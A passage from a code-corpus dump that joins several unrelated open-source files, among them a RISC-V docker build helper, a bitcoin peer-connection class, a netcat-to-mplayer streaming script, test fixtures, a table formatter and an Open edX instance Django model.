            shell("docker build -t {} {}".format(
                self.img, self.name))
        self._build()
        # Mark success so future builds can be skipped.
        shell("touch " + done)

    def _build(self):
        """Per-image provisioning: run containers to build toolchains,
        emulators, LLVM, the SBT and to execute its test suite."""
        name = self.name
        docker = Docker(name, self.img)
        if name == "riscv-sbt":
            pass
        elif name == "riscv-gnu-toolchain":
            VOLS["build"].create()
            VOLS["toolchain"].create()
            docker.run("make riscv-gnu-toolchain-newlib")
            docker.run("make riscv-gnu-toolchain-linux")
        elif name == "emu":
            docker.run("make spike")
            docker.run("make qemu")
        elif name == "llvm":
            docker.run("make llvm")
        elif name == "sbt":
            docker.run("make sbt")
            # run sbt tests (all but system)
            docker.run('bash -c "' +
                # sbt log dir
                'mkdir -p junk && ' +
                # restore symlinks (needed if in cygwin fs)
                'git checkout HEAD test/sbt/rv32-hello.s && ' +
                'git checkout HEAD riscv-qemu-tests && ' +
                # build and run tests
                '. scripts/env.sh && ' +
                'make almost-alltests"')
        elif name == "dev":
            pass
        elif name == "gcc7":
            # Named volumes are only needed when bind mounts are disabled.
            if not Docker.BIND:
                VOLS["build"].create()
                VOLS["toolchain"].create()
            docker.run("make riscv-gnu-toolchain-newlib-gcc7")
            docker.run("make riscv-gnu-toolchain-linux-gcc7")
            docker.run("make llvm-gcc7")
            docker.run("make sbt-gcc7")
        else:
            raise Exception("Invalid: build " + name)
class Images:
    """Registry of all known docker images, buildable by name."""

    def __init__(self):
        self.imgs = [
            Image("riscv-sbt"),
            Image("riscv-gnu-toolchain"),
            Image("emu"),
            Image("llvm"),
            Image("sbt", img="sbt"),
            Image("dev"),
            Image("gcc7")
        ]
        self._iter = None

    def build(self, name, force):
        """Build image `name`; "all" builds every image except gcc7.

        Exits the process with an error message if `name` is unknown.
        """
        # build all?
        if name == "all":
            for img in self.imgs:
                # gcc7 is an optional variant, excluded from "all".
                if img.name == "gcc7":
                    continue
                img.build(force)
            return
        # find and build img by name
        for img in self.imgs:
            if img.name == name:
                img.build(force)
                break
        else:
            # BUG FIX: previously referenced the global `args.build`, which
            # raises NameError when this method is called from code that does
            # not define `args` (e.g. as a library). Use the parameter instead.
            sys.exit("ERROR: component not found: " + name)

    def __iter__(self):
        self._iter = iter(self.imgs)
        return self._iter
#
# main
#
if __name__ == "__main__":
    # Command-line front-end: exactly one action flag is handled per run.
    imgs = Images()
    names = [img.name for img in imgs]

    parser = argparse.ArgumentParser(description="docker build helper")
    parser.add_argument("--save-current-commits", action="store_true",
        help="save the current commit hash of each submodule in commits.txt")
    parser.add_argument("--get-srcs", action="store_true",
        help="clone and checkout all needed sources")
    parser.add_argument("--clean", action="store_true",
        help="remove done files from every docker build dir")
    parser.add_argument("--clean-imgs", action="store_true",
        help="remove <none> and docker related images")
    parser.add_argument("--build", metavar="img", type=str,
        choices=names + ["all"],
        help="build img. imgs=[{}]".format(", ".join(names + ["all"])))
    parser.add_argument("-f", "--force", action="store_true",
        help="force build")
    parser.add_argument("--run", type=str, help="run a docker image")
    parser.add_argument("--exec", type=str,
        help="exec bash on an existing container")
    parser.add_argument("--no-bind", action="store_true",
        help="do not use bind mount for all volumes when running a container")
    parser.add_argument("--rdev", action="store_true",
        help="run dev container")
    parser.add_argument("--xdev", action="store_true",
        help="exec bash on an existing dev container")
    parser.add_argument("--rgcc7", action="store_true",
        help="run gcc7 container")
    parser.add_argument("--xgcc7", action="store_true",
        help="exec bash on an existing gcc7 container")
    parser.add_argument("--mibuild", action="store_true",
        help="build MiBench benchmarks")
    parser.add_argument("--mitest", action="store_true",
        help="test MiBench benchmarks")
    parser.add_argument("--mirun", action="store_true",
        help="run MiBench benchmarks, measuring times")
    args = parser.parse_args()

    if args.no_bind:
        Docker.BIND = False

    # Helper: start a fresh container from image `img`.
    def run(img):
        name = img.replace("sbt-", "")
        docker = Docker(name, img)
        docker.run(interactive=True)

    # Helper: open a shell inside an already-running container.
    def exec(img):
        name = img.replace("sbt-", "")
        docker = Docker(name, img)
        docker.exec("/bin/bash", interactive=True)

    # --save-current-commits
    if args.save_current_commits:
        commits = Commits(TOPDIR, DOCKER_DIR)
        commits.save(commits.get_current())
    # --get-srcs
    elif args.get_srcs:
        srcs = Sources()
        srcs.get()
    # --clean
    elif args.clean:
        with cd(DOCKER_DIR):
            shell("rm -f {}".format(
                " ".join([name + "/done" for name in names])))
    # --clean-imgs
    elif args.clean_imgs:
        Helper.clean_imgs()
    # --build
    elif args.build:
        imgs.build(args.build, args.force)
    # --run
    elif args.run:
        run(args.run)
    # --exec
    elif args.exec:
        exec(args.exec)
    # --rdev
    elif args.rdev:
        run("sbt-dev")
    # --xdev
    elif args.xdev:
        exec("dev")
    # --rgcc7
    elif args.rgcc7:
        run("sbt-gcc7")
    # --xgcc7
    elif args.xgcc7:
        exec("gcc7")
    # --mibuild
    elif args.mibuild:
        docker = Docker("sbt", "sbt")
        docker.run('bash -c "' +
            '. scripts/env.sh && ' +
            'cd mibench && ' +
            './genmake.py --no-arm && ' +
            'make clean benchs"')
    # --mitest
    elif args.mitest:
        Docker("sbt", "sbt").run("make -C mibench benchs-test")
    # --mirun
    elif args.mirun:
        Docker("sbt", "sbt").run('bash -c "' +
            '. scripts/env.sh && ' +
            'mount -t tmpfs tmpfs /tmp && ' +
            'echo 0 > /proc/sys/kernel/kptr_restrict && ' +
            'make -C mibench benchs-measure"')
    # error
    else:
        sys.exit("ERROR: no command specified")
| OpenISA/riscv-sbt | docker/build.py | Python | mit | 15,183 |
import socket
import threading
import Queue
from bitcoin.net import PROTO_VERSION
from bitcoin.messages import MsgSerializable
class PeerConn(threading.Thread):
    """Full-duplex peer connection: background threads pump bitcoin messages
    between an established socket and thread-safe send/receive queues."""

    def __init__(self, conn, protover=PROTO_VERSION):
        """Pass in an established connection."""
        self.conn = conn
        self.peername = conn.getpeername()
        self.protover = protover
        # Inbound messages (or the exception that ended the stream).
        self.recvq = Queue.Queue()
        # Outbound messages; a None item tells the sender thread to stop.
        self.sendq = Queue.Queue()
        self._stopflag = threading.Event()
        super(PeerConn, self).__init__()

    def run(self):
        sendhandler = threading.Thread(target=self._handle_send)
        recvhandler = threading.Thread(target=self._handle_recv)
        sendhandler.start()
        recvhandler.start()
        # When the receiver exits (connection closed), shut everything down.
        recvhandler.join()
        self.stop()
        sendhandler.join()

    def send(self, msg):
        """Queue `msg` for sending; raises ValueError on None."""
        if msg is None:
            # Disallow, because None msg is a signal to stop.
            # Use self.stop to close the connection.
            raise ValueError("Msg must not be None.")
        self.sendq.put(msg)

    def recv(self):
        """Non-blocking: return the next received item, or None if empty."""
        try:
            return self.recvq.get(block=False)
        except Queue.Empty:
            return None

    def _handle_send(self):
        # Sender thread: serialize queued messages onto the socket.
        while True:
            msg = self.sendq.get()
            if msg is None:
                break
            try:
                # NOTE(review): makefile() creates a fresh file object per
                # message and never closes/flushes it explicitly — confirm
                # this does not leak or buffer indefinitely.
                msg.stream_serialize(self.conn.makefile(mode='w'))
            except Exception as e:
                print("Msg send error: {}".format(e))

    def _handle_recv(self):
        # Receiver thread: deserialize messages until the stream fails.
        while True:
            try:
                msg = MsgSerializable.stream_deserialize(
                    self.conn.makefile(mode='r'),
                    protover=self.protover)
            except Exception as e:
                # The exception itself is queued (via finally below) so the
                # consumer can observe the failure.
                msg = e
                if not self._stopflag.is_set():
                    print("Peer connection closed unexpectedly.")
                break
            finally:
                self.recvq.put(msg)

    def stop(self):
        """Signal both worker threads to stop and close the socket."""
        self._stopflag.set()
        # Wake the sender thread with its stop sentinel.
        self.sendq.put(None)
        try:
            self.conn.shutdown(socket.SHUT_RDWR)
        except:
            pass
        self.conn.close()
class MsgList(list):
    """A list of messages whose repr shows one numbered line per item."""

    # Longest item repr shown before truncation kicks in.
    MAXDISPLAYLEN = 72

    def msgrepr(self, msg):
        """Return repr(msg), cut to MAXDISPLAYLEN chars plus an ellipsis."""
        text = repr(msg)
        if len(text) <= self.MAXDISPLAYLEN:
            return text
        return text[:self.MAXDISPLAYLEN] + "..."

    def __repr__(self):
        rendered = []
        for idx, item in enumerate(self):
            rendered.append("{:<3}: {}".format(idx, self.msgrepr(item)))
        return "\n".join(rendered)
| bitcoinfees/talkbitcoin | _talkbitcoin.py | Python | mit | 2,510 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import subprocess
# Listen for a raw UDP video stream on port 5001 and pipe it into mplayer.
# NOTE(review): os.system blocks until the pipeline exits; `running` holds
# the shell's exit status, not a process handle.
running = os.system("nc -u -l -p 5001 | mplayer -cache 1024 -")
#subprocess.check_call('/opt/vc/bin/raspivid -n -w 800 -h 600 -fps 24 -t 0 -o - | socat - udp-sendto:' + '129.16.194.248' + ':5001')
| twistedretard/LaserSimulatedSecurityTurret | src/streaming/server.py | Python | mit | 272 |
import confutil
from skitai.handlers import collectors
from atila import grpc_collector
from examples.services import route_guide_pb2
from atila import multipart_collector
import pytest
from skitai import testutil
@pytest.fixture
def handler (wasc):
    # Virtual-host handler installed into the test server (depends on `wasc`).
    return testutil.install_vhost_handler ()
@pytest.fixture
def post (client):
    # A simple form POST request used by the collector tests below.
    return client.post ("http://www.skitai.com/", {"a": "b"})
@pytest.fixture
def multipart (client):
    # A multipart/form-data upload (form field + image file).
    return client.upload ("http://www.skitai.com/", {"a": "b", "file": open ('./examples/statics/reindeer.jpg', "rb")})
@pytest.fixture
def grpc (client):
    # A gRPC GetFeature request against the RouteGuide example service.
    point = route_guide_pb2.Point (latitude=409146138, longitude=-746188906)
    return client.grpc ("http://www.skitai.com/routeguide.RouteGuide").GetFeature (point)
def test_form_collector (handler, post):
    # Smoke test: FormCollector can be constructed from a form POST.
    c = collectors.FormCollector (handler, post)
def test_h2dummy_collector (handler, post):
    # Smoke test: HTTP2DummyCollector construction with content-length 200.
    c = collectors.HTTP2DummyCollector (handler, post, 200)
def test_multipart_collector (handler, multipart):
    # Smoke test: skitai MultipartCollector with size limits (1024/2048/512).
    c = collectors.MultipartCollector (handler, multipart, 1024, 2048, 512)
def test_alita_multipart_collector (handler, multipart):
    # Smoke test: atila's MultipartCollector with the same size limits.
    c = multipart_collector.MultipartCollector (handler, multipart, 1024, 2048, 512)
def test_alita_grpc_collector (handler, grpc):
    # Smoke test: atila's grpc_collector built from a gRPC request.
    c = grpc_collector.grpc_collector (handler, grpc)
| hansroh/skitai | tests/level1/test_collectors.py | Python | mit | 1,310 |
# Copyright (c) 2013 LE GOFF Vincent
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT
# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""Module containing the Table class used to represent a table."""
from display.row import Row
class Table:
    """Class used to represent a table with specified columns.

    To build it, you have two options:

      - call the constructor with each column name as a positional argument, or
      - call the constructor and then use the 'add_column' method.

    After setting up the right amount of columns you can use the
    'add_row' method.  This method returns a Row object (see the
    'display.row' module) which can be filled in afterwards:

    >>> from display.table import Table
    >>> contacts = Table("First name", "Name", "Job")
    >>> # Note that you can achieve the same by doing for instance:
    >>> # contacts = Table("First name", "Name")
    >>> # contacts.add_column("Job")
    >>> contacts.add_row("Mike", "Arthur", "developer")
    >>> row = contacts.add_row("John", "Wingham")
    >>> row.set("Job", "designer")
    >>> print(contacts)
    | First name | Name    | Job       |
    | Mike       | Arthur  | developer |
    | John       | Wingham | designer  |

    Methods to sort and present the table are also provided.
    """

    def __init__(self, *columns, column_separator=" | ", left_border="| ",
            right_border=" |"):
        # Column headers, in display order.
        self.columns = list(columns)
        # Row objects (see display.row), appended by add_row().
        self.rows = []
        self.column_separator = column_separator
        self.left_border = left_border
        self.right_border = right_border

    def __repr__(self):
        # FIX: the closing '>' was missing from the repr string.
        return "<table of {} columns on {} rows>".format(
                len(self.columns), len(self.rows))

    def __str__(self):
        return self.display()

    def add_column(self, name):
        """Add a new column."""
        self.columns.append(name)

    def add_row(self, *contents):
        """Add a new row with each column content as a positional argument.

        You can partly fill a row and then set new informations.  The
        newly created Row is returned so it can be updated afterwards.
        """
        row = Row(self)
        row.set_contents(*contents)
        self.rows.append(row)
        return row

    def display(self):
        """Render the table (header line plus one line per row).

        Raises ValueError if the rendered line would exceed 79 characters.
        """
        # Width of each column: the widest of header and cell contents.
        column_sizes = [len(column) for column in self.columns]
        for row in self.rows:
            for i, column in enumerate(row):
                if column_sizes[i] < len(column):
                    column_sizes[i] = len(column)

        length_line = sum(column_sizes) + len(self.column_separator) * \
                len(self.columns)
        length_line += len(self.left_border) + len(self.right_border)
        if length_line > 79:
            raise ValueError("line too long")

        # Build one format string shared by the header and every row.
        lines = []
        line_format = self.left_border
        for i, size in enumerate(column_sizes):
            if i > 0:
                line_format += self.column_separator
            line_format += "{:<" + str(size) + "}"
        line_format += self.right_border
        lines.append(line_format.format(*self.columns))
        for row in self.rows:
            lines.append(line_format.format(*row.datas))
        return "\n".join(lines)

    def sort_by(self, *columns):
        """Sort the rows by the specified column names.

        Raises ValueError if any name is not a column of this table.
        Example: table.sort_by("name", "first name")
        """
        # Validate names up front; the sort key uses the names directly
        # (a previously collected index list was dead code and was removed).
        for column in columns:
            if column not in self.columns:
                raise ValueError("the column {} is not present in this " \
                        "table".format(repr(column)))
        self.rows.sort(key=lambda row: row.get_tuple(*columns))
| v-legoff/pa-poc3 | src/display/table.py | Python | bsd-3-clause | 5,852 |
def palindrome2(x):
    """Return True if the string form of *x* reads the same in reverse."""
    text = str(x)
    return all(a == b for a, b in zip(text, reversed(text)))
| ultranaut/illacceptanything | code/palindrome2.py | Python | mit | 59 |
"""Modoboa compatibility matrix."""
# Maps each Modoboa core release to pip-style version specifiers for the
# extension versions known to work with it.
COMPATIBILITY_MATRIX = {
    "1.8.1": {
        "modoboa-pdfcredentials": "<=1.1.0",
        "modoboa-sievefilters": "<=1.1.0",
        "modoboa-webmail": "<=1.1.5",
    },
    "1.8.2": {
        "modoboa-pdfcredentials": ">=1.1.1",
        "modoboa-sievefilters": ">=1.1.1",
        "modoboa-webmail": ">=1.2.0",
    },
    "1.8.3": {
        "modoboa-pdfcredentials": ">=1.1.1",
        "modoboa-sievefilters": ">=1.1.1",
        "modoboa-webmail": ">=1.2.0",
    },
    "1.9.0": {
        "modoboa-pdfcredentials": ">=1.1.1",
        "modoboa-sievefilters": ">=1.1.1",
        "modoboa-webmail": ">=1.2.0",
    }
}

# Minimum Modoboa core version required before an optional extension is
# offered at all.
EXTENSIONS_AVAILABILITY = {
    "modoboa-contacts": "1.7.4",
}
| modoboa/modoboa-installer | modoboa_installer/compatibility_matrix.py | Python | mit | 719 |
# -*- coding: utf-8 -*-
#
# OpenCraft -- tools to aid developing and hosting free software projects
# Copyright (C) 2015-2019 OpenCraft <xavier@opencraft.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
"""
Instance app models - Open edX Instance models
"""
import string
import re
from django.core.cache import cache
from django.conf import settings
from django.db import models, transaction
from django.db.backends.utils import truncate_name
from django.db.models import F
from django.template import loader
from django.urls import reverse
from django.utils import timezone
from instance import gandi
from instance.logging import log_exception
from instance.models.appserver import Status as AppServerStatus
from instance.models.instance import Instance
from instance.models.load_balancer import LoadBalancingServer
from instance.models.mixins.domain_names import DomainNameInstance
from instance.models.mixins.load_balanced import LoadBalancedInstance
from instance.models.mixins.openedx_static_content_overrides import OpenEdXStaticContentOverridesMixin
from instance.models.mixins.openedx_database import OpenEdXDatabaseMixin
from instance.models.mixins.openedx_monitoring import OpenEdXMonitoringMixin
from instance.models.mixins.openedx_periodic_builds import OpenEdXPeriodicBuildsMixin
from instance.models.mixins.openedx_site_configuration import OpenEdXSiteConfigurationMixin
from instance.models.mixins.openedx_storage import OpenEdXStorageMixin
from instance.models.mixins.openedx_theme import OpenEdXThemeMixin
from instance.models.mixins.secret_keys import SecretKeyInstanceMixin
from instance.models.openedx_appserver import OpenEdXAppConfiguration
from instance.models.utils import ConsulAgent, WrongStateException, get_base_playbook_name
from instance.signals import appserver_spawned
from instance.utils import sufficient_time_passed
# Models ######################################################################
class OpenEdXInstance(
DomainNameInstance,
LoadBalancedInstance,
OpenEdXAppConfiguration,
OpenEdXStaticContentOverridesMixin,
OpenEdXDatabaseMixin,
OpenEdXMonitoringMixin,
OpenEdXStorageMixin,
OpenEdXThemeMixin,
OpenEdXPeriodicBuildsMixin,
OpenEdXSiteConfigurationMixin,
SecretKeyInstanceMixin,
Instance
):
"""
OpenEdXInstance: represents a website or set of affiliated websites powered by the same
OpenEdX installation.
"""
# Most settings/fields are inherited from mixins
successfully_provisioned = models.BooleanField(default=False)
database_name = models.CharField(blank=False, unique=True, max_length=60)
    def __init__(self, *args, **kwargs):
        """Init; pops the optional `random_prefix` kwarg before Django sees it."""
        self.random_prefix = kwargs.pop('random_prefix', None)
        super().__init__(*args, **kwargs)
    class Meta:
        # Human-readable model name shown in the Django admin.
        verbose_name = 'Open edX Instance'
    def __str__(self):
        """Return e.g. "My Instance (example.com)"."""
        return "{} ({})".format(self.name, self.domain)
    def get_absolute_url(self):
        """
        Return link to the instance admin page, e.g. /instance/210/

        This link is shown in Django's admin. The path component is the
        InstanceReference id, not this model's own pk.
        """
        return reverse('instance:index') + str(self.ref.id) + "/"
    @property
    def admin_url(self):
        """
        Returns the Django admin change-page url for this instance.
        """
        return reverse('admin:instance_openedxinstance_change', args=(self.id,))
    def get_active_appservers(self):
        """
        Returns a queryset (or cached list) containing the active appservers.
        """
        if hasattr(self.ref, '_cached_active_appservers'):
            # A database optimization like prefetch_related() has computed the active
            # appservers for a large number of instances and cached that result on
            # the InstanceReference of each one.
            # (This is used to optimize the /api/v1/instances/ endpoint query for example)
            return self.ref._cached_active_appservers
        return self.appserver_set.filter(_is_active=True)
    def get_latest_deployment(self):
        """ The latest OpenEdXDeployment associated with this instance, or None. """
        deployment = super(OpenEdXInstance, self).get_latest_deployment()
        if deployment:
            # Downcast the generic Deployment to its OpenEdX subclass.
            return deployment.openedxdeployment
        return None
def generate_database_name(self):
"""
The database name used for external databases/storages, if any.
"""
name = self.internal_lms_domain.replace('.', '_')
# Escape all non-ascii characters and truncate to 50 chars.
# The maximum length for the name of a MySQL database is 64 characters.
# But since we add suffixes to database_name to generate unique database names
# for different services (e.g. xqueue) we don't want to use the maximum length here.
allowed = string.ascii_letters + string.digits + '_'
escaped = ''.join(char for char in name if char in allowed)
return truncate_name(escaped, length=40)
    def save(self, **kwargs):
        """
        Set default values before saving the instance, then sync Consul metadata.
        """
        # Set default field values from settings - using the `default` field attribute confuses
        # automatically generated migrations, generating a new one when settings don't match
        if not self.edx_platform_commit:
            self.edx_platform_commit = self.openedx_release
        if self.storage_type is None:
            self.storage_type = settings.INSTANCE_STORAGE_TYPE
        # If left blank, the base playbook name will be automatically selected
        # based on the openedx release
        if not self.configuration_playbook_name:
            self.configuration_playbook_name = get_base_playbook_name(self.openedx_release)
        if self.random_prefix is not None:
            # Use the constructor-supplied random prefix as the MySQL user name.
            self.mysql_user = self.random_prefix
        if not self.database_name:
            self.database_name = self.generate_database_name()
        # The instance is newly created
        if not self.pk:
            self.logger.info('successful_instance_create: %s', str(self))
        super().save(**kwargs)
        # Keep the Consul key/value metadata in sync with the saved model.
        self.update_consul_metadata()
    def get_load_balancer_configuration(self, triggered_by_instance=False):
        """
        Return the haproxy configuration fragment and backend map for this instance,
        as a (backend_map, backend_conf) pair of lists.

        The triggered_by_instance flag indicates whether the reconfiguration was initiated by this
        instance, in which case we log additional information.
        """
        if settings.DISABLE_LOAD_BALANCER_CONFIGURATION:
            self.logger.info(
                'Direct load balancer reconfiguration disabled. No haproxy '
                'configuration fragment and backend map will be generated.'
            )
            return [], []
        active_appservers = self.get_active_appservers()
        if not active_appservers.exists():
            # Nothing active yet: serve the preliminary ("coming soon") page.
            return self.get_preliminary_page_config(self.ref.pk)

        # Create the haproxy backend configuration from the list of active appservers
        appserver_vars = []
        for appserver in active_appservers:
            server_name = "appserver-{}".format(appserver.pk)
            if not appserver.server.public_ip:
                self.logger.error(
                    "Active appserver does not have a public IP address. This should not happen. "
                    "Updating internal status to double check."
                )
                appserver.server.update_status()
                if not appserver.server.public_ip:
                    raise WrongStateException("Public IP still not available for active appserver. "
                                              "Canceling reconfiguration process.")
            appserver_vars.append(dict(ip_address=appserver.server.public_ip, name=server_name))

        if not appserver_vars:
            self.logger.error(
                "No active appservers found with public IP addresses. This should not happen. "
                "Deconfiguring the load balancer backend."
            )
            return [], []

        backend_name = "be-{}".format(self.domain_slug)
        template = loader.get_template("instance/haproxy/openedx.conf")
        config = template.render(dict(
            domain=self.domain,
            http_auth_info_base64=self.http_auth_info_base64(),
            appservers=appserver_vars,
            # Health checks are only useful with more than one backend server.
            health_check=len(appserver_vars) > 1,
        ))
        backend_map = [(domain, backend_name) for domain in self.get_load_balanced_domains()]
        backend_conf = [(backend_name, config)]
        if self.enable_prefix_domains_redirect:
            # Also map the legacy prefix domains to a redirecting backend.
            redirect_backend_name = "be-redirect-{}".format(self.domain_slug)
            redirect_template = loader.get_template('instance/haproxy/redirect.conf')
            redirect_config = redirect_template.render(dict(
                domain=self.internal_lms_domain
            ))
            backend_map += [(domain, redirect_backend_name) for domain in self.get_prefix_domain_names()]
            backend_conf += [(redirect_backend_name, redirect_config)]
        if triggered_by_instance:
            self.logger.info(
                "New load-balancer configuration:\n backend map: %s\n configuration: %s",
                backend_map,
                backend_conf,
            )
        return backend_map, backend_conf
    def set_active_vm_dns_records(self, deactivate_appserver=False):
        """
        Set DNS A records (vm1..vmN.<internal LMS domain>) for all active app servers.

        When `deactivate_appserver` is True, also remove the record at the
        first index past the active ones (left over by a deactivation).
        """
        self.logger.info("Setting DNS records for active app servers...")
        # Serialize DNS updates per instance to avoid concurrent modification.
        with cache.lock('appserver_dns_record_update_{}'.format(self.ref.instance_id)):
            active_appservers = self.get_active_appservers()
            for i, appserver in enumerate(active_appservers, 1):
                ip_addr = appserver.server.public_ip
                if ip_addr:
                    domain = "vm{index}.{base_domain}".format(index=i, base_domain=self.internal_lms_domain)
                    gandi.api.set_dns_record(domain, type="A", value=ip_addr)
            if deactivate_appserver:
                unused_dns_index = active_appservers.count() + 1
                domain = "vm{index}.{base_domain}".format(index=unused_dns_index, base_domain=self.internal_lms_domain)
                gandi.api.remove_dns_record(domain, type="A")
    def clean_up_appserver_dns_records(self):
        """
        Removes the per-appserver vmN DNS A records (used when archiving).
        """
        self.logger.info("Cleaning up DNS records for app servers...")
        # Same lock as set_active_vm_dns_records to avoid racing updates.
        with cache.lock('appserver_dns_record_update_{}'.format(self.ref.instance_id)):
            for i, _ in enumerate(self.get_active_appservers(), 1):
                domain = "vm{index}.{base_domain}".format(index=i, base_domain=self.internal_lms_domain)
                gandi.api.remove_dns_record(domain, type="A")
    @property
    def appserver_set(self):
        """
        Get the related manager for the OpenEdXAppServers owned by this instance.
        """
        return self.ref.openedxappserver_set
    @property
    def first_activated(self):
        """
        Returns the activation date for the first activated ``AppServer`` for
        this instance, or ``None`` if there is no AppServer, or no AppServer
        has yet been activated.

        :return: Union[None, datetime]
        """
        try:
            first_activated_appserver = self.appserver_set.filter(
                last_activated__isnull=False
            ).earliest('last_activated')
            return first_activated_appserver.last_activated
        except models.ObjectDoesNotExist:
            # earliest() raises when the filtered queryset is empty.
            return None
    @property
    def latest_archiving_date(self):
        """
        Returns the datetime the instance has been most recently archived,
        derived from "Archiving instance finished." log entries.

        :return: Union[None, datetime]
        """
        relevant_log_regex = r'Archiving instance finished.'
        relevant_log_entries = [l for l in self.log_entries if re.search(relevant_log_regex, l.text)]
        if not self.ref.is_archived or not relevant_log_entries:
            # We need log entries to determine when the instance has most recently been archived
            return None
        return max([l.created for l in relevant_log_entries])
    def _spawn_appserver(self, deployment_id=None):
        """
        Provision load balancing, DNS and external services, then create a new
        AppServer record (not yet provisioned).

        Returns the new AppServer on success or None on failure.
        """
        if not self.load_balancing_server:
            self.load_balancing_server = LoadBalancingServer.objects.select_random()
            self.save()
            self.reconfigure_load_balancer()
        # We unconditionally set the DNS records here, though this would only be strictly needed
        # when the first AppServer is spawned. However, there is no easy way to tell whether the
        # DNS records have already been successfully set, and it doesn't hurt to always do it.
        self.set_dns_records()

        # Provision external databases:
        # TODO: Use db row-level locking to ensure we don't get any race conditions when creating these DBs.
        # Use select_for_update(nowait=True) to lock this object's row, then do these steps, then refresh_from_db
        self.logger.info('Provisioning MySQL database...')
        self.provision_mysql()
        self.logger.info('Provisioning MongoDB databases...')
        self.provision_mongo()
        if self.storage_type == self.SWIFT_STORAGE:
            self.logger.info('Provisioning Swift container...')
            self.provision_swift()
        elif self.storage_type == self.S3_STORAGE:
            self.logger.info('Provisioning S3 bucket...')
            self.provision_s3()
        if self.cache_db == OpenEdXDatabaseMixin.REDIS:
            self.logger.info('Provisioning Redis user ACL...')
            self.provision_redis()
        elif self.cache_db == OpenEdXDatabaseMixin.RABBIT_MQ:
            self.logger.info('Provisioning RabbitMQ vhost...')
            self.provision_rabbitmq()
        else:
            # Only Redis and RabbitMQ are supported as cache/queue backends.
            raise NotImplementedError(f"{self.cache_db} does not provision any cache DBs")
        return self._create_owned_appserver(deployment_id=deployment_id)
    @log_exception
    def spawn_appserver(self,
                        mark_active_on_success=False,
                        num_attempts=1,
                        success_tag=None,
                        failure_tag=None,
                        deployment_id=None):
        """
        Provision a new AppServer

        Wrapper around the spawning function to allow for multiple attempts

        Optionally mark the new AppServer as active when the provisioning completes.
        Optionally retry up to 'num_attempts' times.
        Optionally tag the instance with 'success_tag' when the deployment succeeds,
        or failure_tag if it fails.

        Returns the ID of the new AppServer or None in case of failure.
        """
        # pylint: disable=cyclic-import, useless-suppression
        from instance.models.openedx_deployment import OpenEdXDeployment
        for attempt in range(num_attempts):
            self.logger.info("Spawning new AppServer, attempt {} of {}".format(attempt + 1, num_attempts))
            app_server = self._spawn_appserver(deployment_id=deployment_id)

            if app_server and app_server.provision():
                break

            # Don't retry if the deployment was explicitly cancelled.
            if deployment_id:
                deployment = OpenEdXDeployment.objects.get(pk=deployment_id)
                if deployment.cancelled:
                    self.logger.info('Deployment %s was cancelled, returning.', deployment_id)
                    return None

            self.logger.error('Failed to provision new app server')
        else:
            # for-else: every attempt failed without a break.
            self.logger.error('Failed to provision new app server after {} attempts'.format(num_attempts))
            if failure_tag:
                self.tags.add(failure_tag)
            if success_tag:
                self.tags.remove(success_tag)
            # Warn spawn failed after given attempts
            appserver_spawned.send(sender=self.__class__, instance=self, appserver=None, deployment_id=deployment_id)
            return None

        self.logger.info('Provisioned new app server, %s', app_server.name)
        self.successfully_provisioned = True
        self.save()

        if failure_tag:
            self.tags.remove(failure_tag)
        if success_tag:
            self.tags.add(success_tag)

        if mark_active_on_success:
            # use task.make_appserver_active to allow disabling others
            app_server.make_active()
        appserver_spawned.send(sender=self.__class__, instance=self, appserver=app_server, deployment_id=deployment_id)

        return app_server.pk
def _create_owned_appserver(self, deployment_id=None):
    """
    Core internal code that actually creates the child appserver.

    The only reason this is separated from the public spawn_appserver() method is so that
    tests can use this core code as an AppServer factory.
    This method should never be used directly, except in tests.
    Use spawn_appserver() instead.

    Returns the newly created AppServer model instance.
    """
    # Snapshot every OpenEdXAppConfiguration field from this instance so the
    # AppServer keeps a permanent copy of the settings it was created with.
    config_fields = OpenEdXAppConfiguration.get_config_fields()
    instance_config = {field_name: getattr(self, field_name) for field_name in config_fields}

    # Atomic so the appserver row and its LMS user associations are created
    # together or not at all.
    with transaction.atomic():
        app_server = self.appserver_set.create(
            # Name for the app server: this will usually generate a unique name (and won't cause any issues if not):
            name="AppServer {}".format(self.appserver_set.count() + 1),
            deployment_id=deployment_id,
            # Copy the current value of each setting into the AppServer, preserving it permanently:
            configuration_database_settings=self.get_database_settings(),
            configuration_storage_settings=self.get_storage_settings(),
            configuration_theme_settings=self.get_theme_settings(),
            configuration_site_configuration_settings=self.get_site_configuration_settings(),
            configuration_secret_keys=self.get_secret_key_settings(),
            **instance_config
        )
        app_server.add_lms_users(self.lms_users.all())
    return app_server
def require_user_creation_success(self):
    """
    Report whether user provisioning must succeed for this instance.

